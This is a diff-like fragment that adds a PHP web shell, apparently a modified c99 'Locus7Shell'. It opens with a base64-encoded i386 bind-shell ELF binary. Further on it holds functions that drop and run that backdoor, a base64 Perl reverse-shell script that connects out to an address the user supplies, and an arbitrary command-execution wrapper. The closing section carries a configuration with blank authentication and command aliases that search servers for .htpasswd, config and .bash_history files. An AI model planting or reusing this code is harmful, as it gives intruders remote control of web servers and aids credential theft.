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b19nbG9iYWxfY3RvcnNfYXV4AC9idWlsZC9idWlsZGQvZ2xpYmMtMi4zLjYvYnVpbGQtdHJlZS9pMzg2LWxpYmMvY3N1L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
+
+function checkproxyhost(){
+$host = getenv("HTTP_HOST");
+$filename = '/tmp/.setan/xh';
+if (file_exists($filename)) {
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
+} else {
+$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>";
+ } 
+}
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
+{ 
+ $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+ $por = $_POST['backconnectport'];
+ if(is_writable(".")){
+ cfb("shbd",$backdoor);
+ ex("chmod 777 shbd");
+ $cmd = "./shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+ }else{
+ cfb("/tmp/shbd",$backdoor);
+ ex("chmod 777 /tmp/shbd");
+ $cmd = "./tmp/shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
+{
+ if(is_writable(".")){
+ cf("back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("back")) { unlink("back"); }
+ }else{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
+{
+ if(is_writable(".")){
+ cf("backc",$back_connect_c);
+ ex("chmod 777 backc");
+ //$blah = ex("gcc back.c -o backc");
+ $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("backc")) { unlink("backc"); }
+ }else{
+ ex("chmod 777 /tmp/backc");
+ cf("/tmp/backc",$back_connect_c);
+ //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
+}
+
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function cfb($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or bberr();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function err()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>";
+}
+
+function bberr()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
+}
+
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+//EoW
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+//Start Enumerate function
+//function ENUMERATE()
+
+$hostname_x=php_uname(n);
+$itshome = getcwd();
+$itshome = str_replace("/home/","~",$itshome);
+$itshome = str_replace("/public_html","/x2300.php",$itshome);
+$enumerate = "http://".$hostname_x."/".$itshome."";
+
+//End Enumerate function
+
+//Starting calls 
+ini_set("max_execution_time",0); 
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} 
+error_reporting(5); 
+$adires="";
+@ignore_user_abort(TRUE); 
+@set_magic_quotes_runtime(0); 
+$win = strtolower(substr(PHP_OS,0,3)) == "win"; 
+define("starttime",getmicrotime()); 
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} 
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); 
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} 
+
+$shver = "1.0a beta"; //Current version 
+//CONFIGURATION AND SETTINGS 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} 
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} 
+else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL 
+} 
+
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. 
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} 
+if (empty($surl)) 
+{ 
+ $surl = "?".$includestr; //Self url 
+} 
+$surl = htmlspecialchars($surl); 
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. 
+
+//Authentication 
+$login = ""; //login 
+//DON'T FORGOT ABOUT PASSWORD!!! 
+$pass = ""; //password 
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass) 
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") 
+$login_txt = "Restricted area"; //http-auth message. 
+$accessdeniedmess = "<a href=\"http://locus7s.com\">x2300 Locus7Shell v.".$shver."</a>: access denied"; 
+
+$gzipencode = TRUE; //Encode with gzip? 
+
+$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) 
+
+$c99sh_updateurl = "http://locus7s.com/files/lshell_update/"; //Update server 
+$c99sh_sourcesurl = "http://locus7s.com/"; //Sources-server 
+
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time 
+
+$donated_html = "<center><b>x2300 Locus7Shell Modified by #!physx^ </b></center>"; 
+/* If you publish free shell and you wish 
+add link to your site or any other information, 
+put here your html. */ 
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. 
+
+$curdir = "./"; //start folder 
+//$curdir = getenv("DOCUMENT_ROOT"); 
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) 
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) 
+
+$log_email = "user@host.tld"; //Default e-mail for sending logs 
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending 
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies. 
+
+// Registered file-types. 
+//  array( 
+//   "{action1}"=>array("ext1","ext2","ext3",...), 
+//   "{action2}"=>array("ext4","ext5","ext6",...), 
+//   ... 
+//  ) 
+$ftypes  = array( 
+ "html"=>array("html","htm","shtml"), 
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), 
+ "exe"=>array("sh","install","bat","cmd"), 
+ "ini"=>array("ini","inf"), 
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), 
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), 
+ "sdb"=>array("sdb"), 
+ "phpsess"=>array("sess"), 
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") 
+); 
+
+// Registered executable file-types. 
+//  array( 
+//   string "command{i}"=>array("ext1","ext2","ext3",...), 
+//   ... 
+//  ) 
+//   {command}: %f% = filename 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} 
+$dizin = str_replace("\\\\","\\",$dizin); 
+$dizinispd = htmlspecialchars($dizin); 
+/*dizin*/ 
+$real = realpath($dizinispd); 
+$path = basename ($PHP_SELF); 
+function dosyayicek($link,$file) 
+{ 
+   $fp = @fopen($link,"r"); 
+   while(!feof($fp)) 
+   { 
+       $cont.= fread($fp,1024); 
+   } 
+   fclose($fp); 
+
+   $fp2 = @fopen($file,"w"); 
+   fwrite($fp2,$cont); 
+   fclose($fp2); 
+} 
+
+
+
+
+$exeftypes  = array( 
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"), 
+ "perl %f%" => array("pl","cgi") 
+); 
+
+/* Highlighted files. 
+  array( 
+   i=>array({regexp},{type},{opentag},{closetag},{break}) 
+   ... 
+  ) 
+  string {regexp} - regular exp. 
+  int {type}: 
+0 - files and folders (as default), 
+1 - files only, 2 - folders only 
+  string {opentag} - open html-tag, e.g. "<b>" (default) 
+  string {closetag} - close html-tag, e.g. "</b>" (default) 
+  bool {break} - if TRUE and found match then break 
+*/ 
+$regxp_highlight  = array( 
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example 
+  array("config.php",1) // example 
+); 
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. 
+ // array (i=>{letter} ...); string {letter} - letter of a drive 
+//$safemode_diskettes = range("a","z"); 
+$hexdump_lines = 8;// lines in hex preview file 
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line 
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd 
+
+$bindport_pass = "c99";  // default password for binding 
+$bindport_port = "31373"; // default port for binding 
+$bc_port = "31373"; // default port for back-connect 
+$datapipe_localport = "8081"; // default port for datapipe 
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj 
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR 
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT 
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI 
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi 
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl 
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
+
+// Command-aliases 
+if (!$win) 
+{ 
+ $cmdaliases = array( 
+  array("-----------------------------------------------------------", "ls -la"), 
+  array("find all suid files", "find / -type f -perm -04000 -ls"), 
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"), 
+  array("find all sgid files", "find / -type f -perm -02000 -ls"), 
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), 
+  array("find config.inc.php files", "find / -type f -name config.inc.php"), 
+  array("find config* files", "find / -type f -name \"config*\""), 
+  array("find config* files in current dir", "find . -type f -name \"config*\""), 
+  array("find all writable folders and files", "find / -perm -2 -ls"), 
+  array("find all writable folders and files in current dir", "find . -perm -2 -ls"), 
+  array("find all service.pwd files", "find / -type f -name service.pwd"), 
+  array("find service.pwd files in current dir", "find . -type f -name service.pwd"), 
+  array("find all .htpasswd files", "find / -type f -name .htpasswd"), 
+  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), 
+  array("find all .bash_history files", "find / -type f -name .bash_history"), 
+  array("find .bash_history files in current dir", "find . -type f -name .bash_history"), 
+  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), 
